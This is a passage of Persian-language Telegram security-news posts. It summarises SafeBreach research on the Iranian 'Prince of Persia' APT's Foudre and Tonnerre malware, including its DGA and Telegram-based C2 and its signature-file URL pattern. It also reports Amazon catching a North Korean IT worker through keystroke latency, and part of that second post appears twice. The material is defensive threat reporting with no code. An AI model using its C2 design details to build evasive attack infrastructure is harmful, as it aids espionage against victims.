- بدافزار Foudre: کارش شناسایی و ارزیابی قربانی برای اینکه مشخص بشه، قربانی ارزش حمله رو داره یا نه (Profiler) اگه اوکی بود بعنوان دانلودر، بدافزار مرحله ی دوم رو دانلود و نصب میکنه. این بدافزار معمولا از طریق ایمیل فیشینگ توزیع میشه.
- بدافزار Tonnerre: برای استخراج اطلاعات با ارزش از سیستم قربانی، استفاده میشه.
محققا کمپین جدیدی از این گروه رو شناسایی کردن که قربانیانی در ایران، عراق، ترکیه، هند و کانادا و اروپا داشته. در این حملات از Foudre (version 34) و Tonnerre (versions 12-18, 50) استفاده شده.
قبلا از ماکروهای اکسل برای نصب Foudre استفاده میکردن اما الان فایل اجرایی رو داخل این اسناد قرار میدن.
یکی از برجسته ترین ویژگی های این گروه استفاده از الگوریتم تولید دامنه (DGA) برای مقاوم کردن زیرساخت C2 هستش. همچنین برای بررسی اصالت دامنه، Foudre و Tonnerre، هر روز یک فایل امضای RSA رو دانلود و بصورت محلی مقایسه میکنن. قالب درخواست به این صورت بوده:
https://<domain name>/key/<domain name><yy><day of year>.sig
در بررسی زیر ساخت C2، یک فولدر key پیدا کردن که برای اعتبارسنجی C2 استفاده میشه. یکسری فولدر دیگه برای لاگ ارتباط و فایلهای استخراج شده، وجود داشته. یک دایرکتوری بنام download هم بوده مشخص نیست برای چیه اما حدس می زنن برای دانلود و ارتقاء نسخه هاست.
آخرین نسخه Tonnerre از یک گروه تلگرامی بعنوان سرور C2 استفاده میکنه که این گروه دو عضو داره: یک بات تلگرام با نام ttestro1bot که احتمالا برای صدور دستورات و جمعآوری داده استفاده میشه و کاربری با شناسه ehsan8999100.
اگرچه استفاده از پیامرسانها برای C2 موضوع جدیدی نیست، اما نکته قابل توجه این که اطلاعات مربوط به این گروه تلگرامی در فایلی به نام tga.adr و در دایرکتوری به نام t در سرور C2 ذخیره شده. شایان ذکر است که دانلود فایل tga.adr فقط برای فهرست مشخصی از GUIDهای قربانی قابل فعالسازی است.
محققای SafeBreach همچنین نسخههای قدیمیتری رو شناسایی کردن که در کمپینهای Foudre بین سالهای ۲۰۱۷ تا ۲۰۲۰ استفاده شدن، از جمله:
- نسخهای از Foudre که در قالب Amaq News Finder مخفی شده بود تا بدافزار رو دانلود و اجرا کنه.
- نسخه جدیدی از یک تروجان بنام MaxPinner که توسط DLL مربوط به Foudre نسخه ۲۴ دانلود و برای جاسوسی از محتوای تلگرام بکار میرفت.
- بدافزاری بنام Deep Freeze که مشابه Amaq News Finder است و برای آلودهسازی قربانیان به Foudre استفاده میشد.
- یک بدافزار ناشناخته با نام Rugissement
محققای SafeBreach گفتن: با وجود اینکه به نظر میرسید این گروه در سال ۲۰۲۲ ناپدید شده، بازیگران تهدید Prince of Persia دقیقا برعکس عمل کردن. تحقیقات ما اطلاعات حیاتی در خصوص فعالیتهای این گروه در سه سال گذشته رو ارائه میده.
#بازیگران_تهدید #ایران
#APT #SafeBreach #PrinceofPersia #Infy
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
SafeBreach
Unmasking the Evolving Iranian Prince of Persia | SafeBreach
New research unmasks the evolving Iranian "Prince of Persia" APT, detailing new Tonnerre v50 malware, C2 shift to Telegram, and increased scale.
❤6
🔴 آمازون متوجه شده که وقتی یکی از کارمندای IT دستوری رو وارد میکنه، با تاخیر ثابت بیش از 110 میلی ثانیه، به آمازون میرسه. مقداری که برای فردی که در آمریکا هستش باید حدودا 10 میلی ثانیه باشه. این قضیه نشان میده که این فرد احتمالا اون ور دنیاست و در نتیجه به این قضیه مشکوک میشن.
بعد از بررسی متوجه شدن که این کارمند در حقیقت از بچه های کره شمالی هستش.
آمازون خودش مستقیما این فرد رو استخدام نکرده و یک شرکت پیمانکار که با آمازون قرارداد داشته، ایشون رو بعنوان نیروی IT معرفی کرده. فرد کره شمالی با هویت جعلی وارد فرآیند استخدام همون شرکت پیمانکار شده. آمازون لپتاپ سازمانی رو به پیمانکار داده ولی فرد پشت سیستم در واقع نیروی کرهشمالی بوده.
با توجه به اینکه دسترسی حساسی نداشته، مدتی رو نشستن رفتار و فعالیتهای این فرد رو بررسی کردن.
استیون اشمیت، مدیر ارشد امنیت آمازون در یک رویداد امنیتی در دفتر آمازون در نیویورک گفته که از آوریل ۲۰۲۴ تاکنون، کارکنان آمازون بیش از ۱۸۰۰ تلاش از سوی کرهشمالی، برای استخدام شدن رو شناسایی و خنثی کردن. به گفته ی شرکت، امسال تعداد این تلاشها بطور متوسط از یک فصل به فصل بعد، ۲۷ درصد افزایش داشته.
این خبر از دو زاویه مورد توجه قرار گرفته، یکی نفوذ کره شمالی به شرکتهایی مانند آمازون و از طرفی ثبت کلیدهای کارمندان توسط آمازون. / منبع
#آمازون #کره_شمالی
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
بعد از بررسی متوجه شدن که این کارمند در حقیقت از بچه های کره شمالی هستش.
آمازون خودش مستقیما این فرد رو استخدام نکرده و یک شرکت پیمانکار که با آمازون قرارداد داشته، ایشون رو بعنوان نیروی IT معرفی کرده. فرد کره شمالی با هویت جعلی وارد فرآیند استخدام همون شرکت پیمانکار شده. آمازون لپتاپ سازمانی رو به پیمانکار داده ولی فرد پشت سیستم در واقع نیروی کرهشمالی بوده.
با توجه به اینکه دسترسی حساسی نداشته، مدتی رو نشستن رفتار و فعالیتهای این فرد رو بررسی کردن.
استیون اشمیت، مدیر ارشد امنیت آمازون در یک رویداد امنیتی در دفتر آمازون در نیویورک گفته که از آوریل ۲۰۲۴ تاکنون، کارکنان آمازون بیش از ۱۸۰۰ تلاش از سوی کرهشمالی، برای استخدام شدن رو شناسایی و خنثی کردن. به گفته ی شرکت، امسال تعداد این تلاشها بطور متوسط از یک فصل به فصل بعد، ۲۷ درصد افزایش داشته.
این خبر از دو زاویه مورد توجه قرار گرفته، یکی نفوذ کره شمالی به شرکتهایی مانند آمازون و از طرفی ثبت کلیدهای کارمندان توسط آمازون. / منبع
#آمازون #کره_شمالی
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
Bloomberg.com
Amazon Caught North Korean IT Worker By Tracing Keystroke Data
Security personnel tracked connections from a contractor.
❤11